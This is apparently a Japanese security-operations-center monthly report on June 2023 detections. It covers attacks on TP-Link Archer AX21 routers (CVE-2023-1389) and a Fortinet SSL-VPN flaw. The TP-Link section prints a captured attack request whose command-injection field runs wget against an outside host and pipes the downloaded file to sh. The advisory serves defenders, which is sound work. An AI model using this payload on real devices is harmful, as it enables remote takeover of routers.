Know your enemy.Defense leadership.

2023.07.18

MBSD-SOC

2023年6月度 MBSD-SOCの検知傾向トピックス

TP-Link製ルータArcher AX21の脆弱性(CVE-2023-1389)を狙った攻撃

 今月は、TP-Link製ルータArcher AX21の脆弱性を狙った攻撃が増加しました。本脆弱性は、2023年3月に公開されたコマンドインジェクションの脆弱性です。入力検証(サニタイズ処理)の不備により、認証なしで任意のコマンドを実行されてしまう恐れがあります。5月1日(月)に米国のサイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)が積極的に悪用されている脆弱性として、KEV(Known Exploited Vulnerabilities Catalog)へ追加し、注意喚起を促しています。

 弊社SOCでは、5月31日(水)から6月上旬にかけて検知数が増加しました。下図は、今年5月から6月末までの本脆弱性を狙った攻撃数の推移です。グラフ1_202306.PNG 下図は、弊社SOCで実際に検知した攻撃のパケットペイロードです。POSTリクエストのボディ部において、不審なファイルをダウンロード後、実行を試みた通信となっています。

図. CVE-2023-1389の脆弱性を狙った攻撃検知例

POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: www.example.co.jp
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept; */*
User-Agent: condi-bbos
Content-Length: 60

operation=write&country=$(id>`wget http://160[.]16[.]103[.]108/.p/e -O-|sh`)

 なお、6月におけるTP-Link製ルータの脆弱性(CVE-2023-1389)を狙った攻撃の攻撃元国の上位5件は以下の通りです。韓国、台湾、アメリカが上位を占めております。

表. CVE-2023-1389の脆弱性を狙った攻撃国上位5件(2023年6月)
# 国名 割合
1  韓国 19.8 % 
2  台湾 19.5 % 
3  アメリカ 15.0 % 
4  香港 7.4 % 
5  ドイツ 7.1 % 

参考情報


Fortinet製品のSSL-VPN機能における脆弱性(CVE-2023-27997)について

 Fortinet社は、613()Fortinet製品のSSL-VPN機能における脆弱性(CVE-2023-27997)を公開しました。影響対象の製品は、FortiOSおよびFortiProxyとなっています。本脆弱性を悪用された場合、リモートから第三者に認証無しで任意のコードを実行されてしまう恐れがあります。弊社SOCでは、6月末までに本脆弱性を悪用する攻撃は検知しておりません。Fortinet社からは、本脆弱性を悪用する攻撃が報告されているため、影響対象の製品を使用している場合は、早急に対策されることをお勧めいたします。

参考情報

MBSD-SOC

シェアする ツイートする